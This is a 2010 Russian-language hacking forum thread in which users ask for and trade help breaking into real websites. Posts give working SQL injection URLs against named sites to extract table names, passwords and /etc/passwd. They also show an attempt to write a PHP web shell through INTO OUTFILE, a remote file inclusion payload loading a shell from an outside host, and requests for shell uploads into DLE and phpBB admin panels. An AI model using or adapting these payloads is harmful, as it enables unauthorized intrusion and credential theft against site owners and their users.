Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    мда
     
  2. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10+or+(select+count(*)+from+information_schema.tables+group+by+concat(table_name,floor(rand(0)*2)))--

    Data truncated for column 'guid' at row 1Duplicate entry 'achievement_reward1' for key 'group_key'

    все понел?
     
  3. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    Тоже самое выложил )))
     
  4. Deani

    Deani New Member

    Joined:
    9 Nov 2009
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    да, спасибо большое !
     
  5. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    как пути на сервере раскрыть ? есть доступ к phpmyadmin
    phpmyadmin/phpinfo.php ничего не выводит...
    кстати сервер под виндой
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    кстате /phpmyadmin/scripts/setup.php доступен ли и какая версия phpmyadmin-а
     
  7. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    phpmyadmin 3.2.0.1, сервер Microsoft-IIS/6.0
    /phpmyadmin/scripts/setup.php не доступен, этот файл удалён
     
  8. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Не могу вытащить логины да пароли из слепой скули

    http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4,5%23

    на 6 поле этом вылетает пустая страница.
    Знаю что вывод из скули такой:

    http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+

    Версия:

    http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Select+Name_Const(version(),1),Name_Const(version(),1)%20)a)%23&type=cabinet&action=lost_pw&mode=return_from_hidden

    Помогите вытащить пароли...нужно срочно....есть хочу=)))
     
    #12308 MastaBass1, 11 Apr 2010
    Last edited: 11 Apr 2010
  9. kirill1927

    kirill1927 New Member

    Joined:
    12 Mar 2009
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0
    Всем привет
    есть массив /bla.php?s=sss
    там дописывается инклудинг funtions.php тоесть ссылка получается такая /bla.php?s=sssfuntions.php вставляю %00 => /bla.php?s=sss%00 в ответ
    есть ли возможность обойти фильтрацию ?
     
  10. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Если RFI, то можешь залить на хостинг файлик functions.php, и проинклудить его.

    Стукни мне в асю 674542, или в ПМ кинь сайт, посмотрю.
     
  11. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    /bla.php?s=http://disk.re4ka.net/upload/58739714/wso2.jpg.php?
    Если же фильтрация на http, заюзай data http://www.xakep.ru/magazine/xa/127/060/1.asp
     
  12. kirill1927

    kirill1927 New Member

    Joined:
    12 Mar 2009
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0
    :(
     
  13. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    никто не знает как в DLE шелл залить ?!
     
  14. mayhem

    mayhem New Member

    Joined:
    12 Feb 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Есть Учетка главного модера на phpBB 3.0.7, есть ли уязвимости для получения доступа к админке или заливки шела?
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    залить файл даже с правами админа не можешь
     
    _________________________
  16. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    https://forum.antichat.ru/showpost.php?p=1176333&postcount=36 :)

    https://forum.antichat.ru/showpost.php?p=198446&postcount=3
     
    #12316 .:[melkiy]:., 12 Apr 2010
    Last edited: 12 Apr 2010
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    не знал,спс ;)

    а есть ли возможность во втором версии?
     
    _________________________
    #12317 Konqi, 12 Apr 2010
    Last edited: 12 Apr 2010
  18. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    C одного ресурса вытащил хеши от всего от админки от ПМА и от форума и расшифровал (есть и инклуд, вытащил все конфиги тоже) но никуда не пускает, видимо сервер с вебом находится в локалки доступ к ктоторой идет через прокс.
    Code:
    PORT    STATE  SERVICE    VERSION
    22/tcp  closed ssh
    80/tcp  open   http-proxy Squid webproxy 2.6.STABLE21
    443/tcp closed https
    что можно сделать ? как можно обойти ?
     
    _________________________
  19. papst

    papst New Member

    Joined:
    26 Nov 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    -5
    http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17--
    тут File_Priv на Y..
    http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14,15,16,17+from+mysql.user--
    путь вроде /home/sites/mindviz/mail/
    делаю так
    http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,<?include($_GET[сmd]);?>,10,11,12,13,14,15,16,17+from+mysql.user+into+outfile+'/home/sites/mindviz/mail/shell.php'--
    что не так..??
    http://mindviz.com/shell.php?cmd=phpinfo(); че не идет?
     
  20. papst

    papst New Member

    Joined:
    26 Nov 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    -5
    а какой тогда правельный?.. ато я уже многие пути испробовал
     
Thread Status:
Not open for further replies.